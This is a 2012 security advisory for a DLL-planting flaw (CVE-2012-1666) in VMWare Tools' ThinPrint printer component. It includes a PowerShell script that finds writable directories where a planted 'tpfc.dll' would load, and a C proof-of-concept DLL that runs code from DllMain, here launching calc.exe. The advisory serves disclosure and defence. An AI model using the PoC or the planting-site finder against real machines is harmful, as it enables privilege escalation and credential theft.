Date: Tue, 4 Sep 2012 15:43:14 GMT
Subject: VMWare Tools susceptible to binary planting by hijack

Security Advisory - VMWare Tools susceptible to binary planting by hijack
Summary           : VMWare Tools susceptible to binary planting
Date              : 4 September 2012
Affected versions : Product versions prior to -
                    Workstation 8.0.4
                    Player 4.0.4
                    Fusion 4.1.2
                    View 5.1
                    ESX 5.0 P03
                    ESX 4.1 U3
                    Not affected: ESX 4.0, ESX 3.5
CVE reference     : CVE-2012-1666

VMWare Tools handles many functions involved in host-guest interactivity,
providing a richer environment for end users and server administrators alike.
Part of VMWare Tools' responsibilities is providing printer services through the
host; this is handled by a third-party component (ThinPrint).

During initialisation, which is repeated at many steps of the printer
communication negotiation, the ThinPrint client tries to load a library that
does not exist on the system, using an unqualified name: 'tpfc.dll'. Because no
path is given, the loader walks the standard DLL search order (application
directory, system directories, current directory, then each PATH entry) looking
for that name, and because no legitimate copy exists, nothing earlier in the
search order takes precedence over a planted one.

A user with write access to any directory on that search path can construct a
DLL with the expected name, place it there, and the client will load it
seamlessly; since DllMain runs at load time, the DLL needs no exports for code
execution.

After the DLL has been planted, any unsuspecting user whose session starts the
printer services (for example) will cause it to load, resulting in arbitrary
code execution at that user's privilege level.

This attack vector is mainly used in local privilege escalation scenarios and
user credential harvesting, and can be used by malware to disguise itself,
amongst other uses.
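The search-order walk described above can be audited on a guest before and after patching. The script below is an added example, not code from the Comsec advisory or from VMWare Tools: it enumerates the DLL search order a process started from a given binary would use for an unqualified load of tpfc.dll, checks which of those directories an Allow ACE makes writable for Everyone, Authenticated Users or BUILTIN\Users, and marks every writable directory the loader reaches before (or at) the first existing copy as a planting site. It assumes SafeDllSearchMode is enabled (the Windows default) and that the current directory and PATH of the shell approximate those of the ThinPrint client process; the -ExePath parameter is a placeholder you must set to the actual client binary, which the advisory does not name.

```powershell
# Added example: not part of the Comsec advisory or of VMWare Tools.
# Walks the DLL search order that a process started from -ExePath would use for
# an unqualified load of $DllName and flags directories a low-privileged user
# can write to that the loader reaches before (or at) the first existing copy.
# Assumptions: SafeDllSearchMode is enabled (the Windows default), and this
# shell's current directory and PATH approximate those of the target process.
# -ExePath is a placeholder: set it to the actual ThinPrint client binary.
param(
    [Parameter(Mandatory = $true)][string]$ExePath,
    [string]$DllName = 'tpfc.dll'
)
$ErrorActionPreference = 'Stop'

# Search order with SafeDllSearchMode on, duplicates removed, order preserved.
function Get-DllSearchOrder {
    param([string]$ExePath)
    $dirs = @(
        (Split-Path -Parent $ExePath),          # application directory
        [Environment]::SystemDirectory,         # System32
        (Join-Path $env:SystemRoot 'System'),   # 16-bit system directory
        $env:SystemRoot,                        # Windows directory
        (Get-Location).Path                     # current directory
    ) + @($env:Path -split ';' | ForEach-Object { $_.Trim().Trim('"') } | Where-Object { $_ -ne '' })
    $seen = @{}
    foreach ($d in $dirs) {
        $key = $d.TrimEnd('\').ToLowerInvariant()
        if (-not $seen.ContainsKey($key)) { $seen[$key] = $true; $d }
    }
}

# Heuristic ACL check: an Allow ACE granting write/create/modify/full control
# to Everyone, Authenticated Users or BUILTIN\Users. Deny ACEs and group
# membership subtleties are ignored, so confirm hits by hand.
function Test-LowPrivWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $lowPriv = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')
    $fsr = [System.Security.AccessControl.FileSystemRights]
    $writeBits = [int]($fsr::Write -bor $fsr::CreateFiles -bor $fsr::Modify -bor $fsr::FullControl)
    try { $acl = Get-Acl -LiteralPath $Dir } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }
        if ($lowPriv -contains $sid -and (([int]$ace.FileSystemRights -band $writeBits) -ne 0)) {
            return $true
        }
    }
    return $false
}

$resolvedIn = $null
$order = 0
$report = foreach ($dir in (Get-DllSearchOrder -ExePath $ExePath)) {
    $order++
    $candidate = $dir.TrimEnd('\') + '\' + $DllName
    $hasDll = Test-Path -LiteralPath $candidate -PathType Leaf
    if ($hasDll -and $null -eq $resolvedIn) { $resolvedIn = $dir }
    $writable = Test-LowPrivWritable -Dir $dir
    [pscustomobject]@{
        Order           = $order
        Directory       = $dir
        HasDll          = $hasDll
        LowPrivWritable = $writable
        # Reached before any copy is found, or holding the copy that wins: a
        # writable directory here is where a hijacking DLL can be planted.
        PlantingSite    = $writable -and ($null -eq $resolvedIn -or $resolvedIn -eq $dir)
    }
}

$report | Format-Table -AutoSize | Out-String | Write-Host
if ($null -eq $resolvedIn) {
    Write-Host "$DllName is absent from the whole search order: the unqualified load"
    Write-Host "fails today, and every PlantingSite directory would be searched first."
} else {
    Write-Host "$DllName resolves in $resolvedIn; PlantingSite directories precede it."
}
```

Run it from the account whose session starts the printer services, since that account's PATH and current directory are what the loader sees; a PlantingSite row is where the PoC below, built as tpfc.dll, would be picked up. The script only tells you where planting would succeed: the durable fix sits on the loading side, in the vendor patch that removes the unqualified load, or more generally in loading by fully qualified path or restricting the search (SetDefaultDllDirectories / LOAD_LIBRARY_SEARCH_SYSTEM32 on Windows versions that support them).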

Proof of Concept

Built as tpfc.dll and placed in a directory on the search path, this library
needs no exports: its DllMain runs as soon as the ThinPrint client loads it.

	#include <windows.h>

	/* Payload: launch calc.exe to prove code execution inside the loading process. */
	int hijack_poc(void)
	{
	  WinExec("calc.exe", SW_NORMAL);
	  return 0;
	}

	/* Entry point called by the loader when the planted DLL is mapped. */
	BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
	{
	  if (dwReason == DLL_PROCESS_ATTACH)
	    hijack_poc();
	  return TRUE;  /* report success so the host process carries on normally */
	}

Official patches were released by the vendor and can be fetched from

The issue was responsibly reported by Moshe Zioni from Comsec Global Consulting.

Timeline

4 September 2012
Security advisory released by Comsec Consulting
31 August 2012
Vendor finished deploying fixes to products; release notes published
13 March 2012
Vendor started implementing fixes to products
14 February 2012
First response from vendor
13 February 2012
Bug reported by Moshe Zioni from Comsec Global Consulting to VMWare and to the
third-party printer driver developers in parallel

Release notes

Comsec Global Consulting
